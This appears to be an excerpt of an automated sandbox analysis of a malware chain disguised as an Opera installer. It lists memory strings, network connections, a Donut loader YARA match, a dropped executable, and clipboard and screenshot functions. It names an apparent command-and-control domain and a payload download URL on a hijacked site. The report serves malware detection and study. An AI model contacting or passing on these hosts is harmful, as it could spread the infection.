Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: cmd.exe, 00000007.00000003.2355039420.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000000.2355798117.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, cmd.tmp.9.dr, cmd.tmp.7.dr, cmd.exe.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: cmd.exe, 00000007.00000000.2354484221.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, cmd.exe.0.dr	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.dr	String found in binary or memory: http://www.opera.com0
Source: cmd.exe, 00000007.00000003.2355039420.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000000.2355798117.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, cmd.tmp.9.dr, cmd.tmp.7.dr, cmd.exe.0.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://www.syncovery.com0
Source: MSBuild.exe, 0000000D.00000002.2953557718.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://DfreamWave.cyou/
Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://DfreamWave.cyou/api
Source: MSBuild.exe, 0000000D.00000002.2953313467.0000000003660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://DfreamWave.cyou/pi
Source: MSBuild.exe, 0000000D.00000002.2952491901.000000000104F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://DfreamWave.cyou:443/apiRun
Source: powershell.exe, 00000000.00000002.2371135913.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: MSBuild.exe, 0000000D.00000002.2952198888.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfreamwave.cyou/api
Source: is-40U72.tmp.10.dr	String found in binary or memory: https://github.com/Azure/azure-rest-api-specs/blob/master/specification/resources/resource-manager/r
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000000.00000002.2371135913.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2383933157.0000000007880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goAppVClientCmdlets.psm1h
Source: is-40U72.tmp.10.dr	String found in binary or memory: https://management.azure.com%2019-10-01-preview
Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000000.00000002.2371135913.00000000056F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.littlemoroccanthings.com
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, wEY98gM1Jj.ps1	String found in binary or memory: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.ex
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: https://www.virtualbox.org/

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 34.120.190.48:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49997 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_0043C160 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

13_2_0043C160

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_0043C160 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

13_2_0043C160

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_0043C2F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_0043C2F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.OperaAirSetup.exe.29b243e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\cmd.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_04E3E400	0_2_04E3E400
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9C1F3	12_2_00E9C1F3
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BEDF	12_2_00E9BEDF
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9C1EE	12_2_00E9C1EE
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9C16D	12_2_00E9C16D
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E8E20E	12_2_00E8E20E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E84616	12_2_00E84616
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9A8DB	12_2_00E9A8DB
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9A949	12_2_00E9A949
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9ACAD	12_2_00E9ACAD
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9AC81	12_2_00E9AC81
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9AC10	12_2_00E9AC10
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9AD68	12_2_00E9AD68
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9AD60	12_2_00E9AD60
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E8EFFA	12_2_00E8EFFA
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9EF66	12_2_00E9EF66
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E8115B	12_2_00E8115B
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E85598	12_2_00E85598
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EA165A	12_2_00EA165A
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9B74E	12_2_00E9B74E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EB5AA0	12_2_00EB5AA0
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BBC5	12_2_00E9BBC5
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BB3C	12_2_00E9BB3C
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BB0D	12_2_00E9BB0D
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BB12	12_2_00E9BB12
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BD47	12_2_00E9BD47
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BD28	12_2_00E9BD28
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BD2C	12_2_00E9BD2C
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EB5E00	12_2_00EB5E00
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E9BE12	12_2_00E9BE12
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B03C1	12_2_029B03C1
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02AD9A82	12_2_02AD9A82
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_029B0000	12_2_029B0000
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02ADBC1E	12_2_02ADBC1E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02ADE476	12_2_02ADE476
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02ADB17E	12_2_02ADB17E
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02ADA976	12_2_02ADA976
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_02ADAD46	12_2_02ADAD46
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_0304D480	12_2_0304D480
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_030493E7	12_2_030493E7
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_030493F0	12_2_030493F0
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_03049D40	12_2_03049D40
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_03049D80	12_2_03049D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004490B0	13_2_004490B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004411E0	13_2_004411E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004101B8	13_2_004101B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042AAC0	13_2_0042AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043339B	13_2_0043339B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00411BB4	13_2_00411BB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040BC00	13_2_0040BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043F578	13_2_0043F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00412526	13_2_00412526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00426E00	13_2_00426E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00448610	13_2_00448610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00440EF0	13_2_00440EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043AEAB	13_2_0043AEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042D7E0	13_2_0042D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00401040	13_2_00401040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00412868	13_2_00412868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042B000	13_2_0042B000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00404802	13_2_00404802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00407016	13_2_00407016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004480D0	13_2_004480D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043B8D4	13_2_0043B8D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041E0F6	13_2_0041E0F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044588C	13_2_0044588C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00409090	13_2_00409090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040F0B0	13_2_0040F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004238B0	13_2_004238B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004408B0	13_2_004408B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00421904	13_2_00421904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004489E0	13_2_004489E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004479A0	13_2_004479A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00433A59	13_2_00433A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042B270	13_2_0042B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042A204	13_2_0042A204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00439210	13_2_00439210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00435AF0	13_2_00435AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00433AFC	13_2_00433AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00444A90	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004222A0	13_2_004222A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00422B40	13_2_00422B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00416342	13_2_00416342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00433B4D	13_2_00433B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00408B50	13_2_00408B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00402B60	13_2_00402B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040CB30	13_2_0040CB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042DBD0	13_2_0042DBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00441BE0	13_2_00441BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042DBF0	13_2_0042DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00447BB0	13_2_00447BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00447C40	13_2_00447C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040D45D	13_2_0040D45D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043BC60	13_2_0043BC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00438C78	13_2_00438C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042B411	13_2_0042B411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041CC25	13_2_0041CC25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041F430	13_2_0041F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040ECCF	13_2_0040ECCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00447CD0	13_2_00447CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0043FCE0	13_2_0043FCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00430C90	13_2_00430C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00439500	13_2_00439500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00448D00	13_2_00448D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042ED3C	13_2_0042ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00410DE0	13_2_00410DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040ADF0	13_2_0040ADF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00403580	13_2_00403580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00425E44	13_2_00425E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00430651	13_2_00430651
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00440650	13_2_00440650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041CE5F	13_2_0041CE5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00407E60	13_2_00407E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00419E60	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00409610	13_2_00409610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00410620	13_2_00410620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041C631	13_2_0041C631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00423630	13_2_00423630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042CEC0	13_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004376C7	13_2_004376C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040C6F0	13_2_0040C6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00416E80	13_2_00416E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00422E90	13_2_00422E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004276A0	13_2_004276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00421EBA	13_2_00421EBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040BF40	13_2_0040BF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0040B760	13_2_0040B760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0044271E	13_2_0044271E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00403F20	13_2_00403F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00441F30	13_2_00441F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0041EF38	13_2_0041EF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004387D5	13_2_004387D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00432FF0	13_2_00432FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_0042F780	13_2_0042F780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_004027B0	13_2_004027B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00419E50 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0040B450 appears 51 times
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: String function: 00EA15E0 appears 59 times
